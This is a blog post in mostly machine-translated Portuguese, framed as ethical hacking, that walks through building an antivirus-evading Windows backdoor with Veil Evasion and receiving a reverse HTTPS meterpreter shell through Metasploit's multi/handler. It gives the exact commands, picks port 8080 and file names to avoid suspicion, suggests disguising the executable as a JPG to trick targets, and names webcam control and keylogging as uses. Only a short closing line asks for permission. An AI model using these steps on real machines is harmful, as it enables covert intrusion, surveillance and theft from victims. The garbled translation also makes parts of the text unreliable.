Como criei um backdoor indetectável para Windows — Ethical Hacking

Mar 22 2022
O que é um Backdoor? Backdoor é um método de obter secretamente acesso remoto a um computador, ignorando a autenticação normal e o firewall da máquina. Neste blog, escreverei sobre Como criei um backdoor para minha máquina Windows que nem o antivírus conseguiu detectar.

O que é um Backdoor?

Backdoor é um método de obter secretamente acesso remoto a um computador, ignorando a autenticação normal e o firewall da máquina.

Neste blog, escreverei sobre Como criei um backdoor para minha máquina Windows que nem o antivírus conseguiu detectar. Depois de criar o backdoor, consegui fazer muitas coisas na máquina Windows remotamente, como controlar a webcam, tirar screenshots, usar keyloggers, etc. Vamos começar.

Eu criei o executável (arquivo .exe) no meu arquivo Ubuntu machine. Este .exearquivo, quando executado em uma máquina Windows, criou um backdoor para minha máquina Ubuntu de onde eu pude controlar tudo na máquina Windows.

Vejamos os passos que precisam ser seguidos.

1. Instalando o Véu

Como primeiro passo, precisamos instalar o Veil. Para instalar o Veil você pode acessar este linkhttps://www.javatpoint.com/installing-veil. Também exigirá a instalação do framework metasploitable para usuários do Ubuntu (não necessário para Kali), que pode ser baixado aqui:https://www.darkoperator.com/installing-metasploit-in-ubunt.

Uma vez instalado, você pode começar digitando apenas veil. (ou você pode executá-lo digitando ./Veil.pyno diretório veilestá instalado). A concha do véu será aberta como mostrado abaixo:

2. Usando Evasão no Véu

O framework veil possui 2 ferramentas ( Evasione Ordinance) que podem ser vistas digitando list no veil shell. Estamos interessados ​​em Evasion, então digitamos

> use 1

      
                

Em backdoors é criada uma conexão reversa , ou seja, quando a pessoa-alvo clica duas vezes no script, seu computador iniciará a inicialização do backdoor. Portanto, torna-se indetectável por muitos softwares antivírus porque não há nenhuma máquina externa solicitando a conexão. Eu também usei a porta 8080que é uma porta comum usada para se conectar a sites, então nada parece suspeito para os softwares antivírus.

Tipo :

> list

      
                

> use 15

      
                

Para definir o LHOST e LPORT execute:

> set LHOST <your_IP>
> set LPORT 8080

      
                

Devemos tentar modificar o arquivo e torná-lo mais exclusivo para que ele ignore o antivírus. Não há nenhuma razão real para eu ter escrito as próximas 2 linhas. É apenas para tornar a assinatura um pouco diferente para contornar o antivírus.

Próximo tipo generatepara gerar o arquivo. Um prompt aparecerá para nomear o backdoor. Eu o nomeei, backdoor_8080mas você pode nomeá-lo um pouco diferente para que não cause suspeita.

Uma página aparecerá mostrando a localização do executável salvo.

Parabéns!!! o backdoor é gerado. Está armazenado em:var/lib/veil/output/compiled/backdoor_8080.exe

4. Ouvindo conexões de entrada na porta

Ao criar a porta, usei a porta 8080. Então, vou abrir a porta na minha máquina ubuntu para que ela esteja pronta para se conectar quando o computador de destino executar o executável. Para fazer isso eu uso o framework Metasploit. Para executar o console Metasploit, executemsfconsole

$ msfconsole

      
                

Para abrir a porta usei um módulo fornecido pelo Metasploit. É chamado multi/handler. Então eu corro,

> use exploit/multi/handler

      
                

Vamos alterar essas configurações para atender às nossas necessidades. Execute os seguintes comandos:

> set PAYLAOD windows/meterpreter/reverse_https
> set LHOST <IP>
> set LPORT 8080
> show options

Digite exploitpara começar a ouvir na porta

> exploit

      
                

Existem várias maneiras de engenharia social para entregar o backdoor a um computador de destino. Uma dessas maneiras é descrita no blog abaixo, onde escrevi como criar um trojan. Basicamente, disfarçou o .exearquivo em uma imagem em um .jpgarquivo.

6. Testando o backdoor no Windows

Clicar duas vezes no backdoor_8080.exearquivo na máquina Windows executou meu executável.

No Metasploit onde estávamos ouvindo conexões na máquina Ubuntu, podemos ver que o shell do metepreter foi aberto.

O shell meterpreter será parecido com o mostrado acima. Você pode digitar helppara obter uma longa lista de comandos e sua descrição sobre o que você pode fazer.

Uma lista de comandos básicos que você pode executar é

> sysinfo
> ipconfig
> pwd
> shell

If you liked my blog so far, you could Buy Me A Coffee by clicking on the button below or following this link: https://www.buymeacoffee.com/gouravdhar

Summarising Backdoors

While it seems that creating backdoors is something that is wrong and is done only by blackhat hackers, it is not entirely true. Some of the product-based companies also create backdoors into their products so that if their users lose access to their accounts or products the companies can help them gain access. While the above method is a good way to create backdoors, if you want to be on the ethical side of the line, do not use it to gain access to computers you don’t have permission to.

Para obter atualizações sobre tópicos mais interessantes, siga-me aqui . Sinta-se à vontade para comentar e compartilhar suas experiências e pensamentos. Não se esqueça de verificar meu site em https://gourav-dhar.com para mais blogs relacionados à tecnologia.